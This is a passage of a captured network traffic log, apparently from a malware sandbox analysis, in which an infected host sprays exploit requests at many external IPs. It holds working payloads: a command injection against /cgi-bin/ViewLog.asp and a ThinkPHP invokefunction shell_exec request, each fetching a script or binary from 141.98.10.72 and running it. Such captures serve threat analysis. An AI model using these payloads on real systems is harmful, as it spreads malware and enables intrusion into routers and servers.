945	192.168.2.15	43526	94.123.137.219	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.558975935 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
946	192.168.2.15	39508	95.100.185.228	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.656688929 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:59.858684063 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 14 Feb 2024 08:30:59 GMT Date: Wed, 14 Feb 2024 08:30:59 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 33 65 32 32 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 34 35 39 26 23 34 36 3b 35 35 66 35 36 30 62 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.d3e2217.1707899459.55f560b8</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
947	192.168.2.15	44636	95.217.7.135	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.698561907 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:59.918586969 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:59 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
948	192.168.2.15	39406	95.100.191.242	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.704531908 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:59.930619001 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 14 Feb 2024 08:30:59 GMT Date: Wed, 14 Feb 2024 08:30:59 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 63 64 31 66 35 35 37 26 23 34 36 3b 31 37 30 37 38 39 39 34 35 39 26 23 34 36 3b 35 61 63 34 37 36 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.dcd1f557.1707899459.5ac4765</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
949	192.168.2.15	50536	95.42.29.201	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.704799891 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:59.936861038 CET	49	IN	HTTP/1.1 404 Site or Page Not Found
Feb 14, 2024 09:30:59.937305927 CET	306	IN	Data Raw: 53 65 72 76 65 72 3a 20 44 56 52 44 56 53 2d 57 65 62 73 0d 0a 44 61 74 65 3a 20 57 65 64 20 46 65 62 20 31 34 20 31 31 3a 33 33 3a 30 31 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 Data Ascii: Server: DVRDVS-WebsDate: Wed Feb 14 11:33:01 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/html<html><head><title>Document Error: Site or Page Not Found</title></head><body><h2>Access Error: Site or Page Not Fou

Session ID	Source IP	Source Port	Destination IP	Destination Port
950	192.168.2.15	48644	62.45.0.197	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.734671116 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:00.089982033 CET	166	IN	HTTP/1.1 302 Found Date: Wed, 14 Feb 2024 08:30:59 GMT Location: http://192.168.0.14/remote.html Content-Length: 0 Server: Jetty(8.1.16.v20140903)

Session ID	Source IP	Source Port	Destination IP	Destination Port
951	192.168.2.15	38812	95.58.72.215	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.762542963 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:00.070055962 CET	29	IN	HTTP/1.1 200 OK
Feb 14, 2024 09:31:00.072107077 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
952	192.168.2.15	36698	95.164.22.10	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.771528006 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:00.010565042 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:59 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
953	192.168.2.15	51396	95.86.125.199	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:59.785772085 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
954	192.168.2.15	37602	85.192.56.160	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:00.072027922 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:03.319505930 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:09.463232040 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:21.494853020 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:46.838275909 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
955	192.168.2.15	57820	31.136.251.35	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:00.470218897 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:01.111540079 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:02.359570026 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:04.855397940 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:09.975256920 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:19.959131956 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:40.694438934 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
956	192.168.2.15	48996	85.50.188.66	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:00.506185055 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:00.725805998 CET	254	IN	HTTP/1.0 302 Found Server: httpd Date: Wed, 14 Feb 2024 08:31:24 GMT Location: index.htm Pragma: no-cache Cache-Control: no-cache,no-store,must-revalidate, post-check=0,pre-check=0 Expires: 0 CONTENT-LANGUAGE: en Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
957	192.168.2.15	52490	95.244.23.131	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:00.520579100 CET	1286	IN	HTTP/1.0 400 Bad Request Server: http server 1.0 Content-type: text/html Date: Wed, 14 Feb 2024 08:30:59 GMT Last-modified: Wed, 14 Feb 2024 08:30:59 GMT Accept-Ranges: bytes Connection: close Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 67 69 66 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 67 69 66 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 67 69 66 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 67 69 66 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 4c 75 63 69 64 61 20 47 72 61 6e 64 65 2c 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 46 46 46 46 46 20 75 72 6c 28 27 2f 63 67 69 2d 62 69 6e 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 2f 65 72 72 5f 62 67 2e 6a 70 67 27 29 3b 0a 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 63 6f 6c 6f 72 3a 20 23 41 34 41 33 41 33 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 2c 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 3a 6c 69 6e 6b 2c 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 3a 76 69 73 69 74 65 64 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 4c 75 63 69 64 61 20 47 72 61 6e 64 65 2c 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 41 34 41 33 41 33 3b 0a 7d 0a 2e 71 6e 61 70 5f 62 61 72 31 7b 0a 77 69 64 74 68 3a 20 39 38 30 70 78 3b 0a 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 42 43 42 43 42 43 3b 0a 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 7d 0a 2e 71 6e 61 70 5f 62 61 72 5f 69 6d 67 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Cache-Control" content="no-cache" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><link rel="shortcut icon" href="/images/favicon.gif" type="image/gif" /><link rel="icon" href="/images/favicon.gif" type="image/gif" /><style type="text/css">body{font-family:Verdana, Lucida Grande, Tahoma, 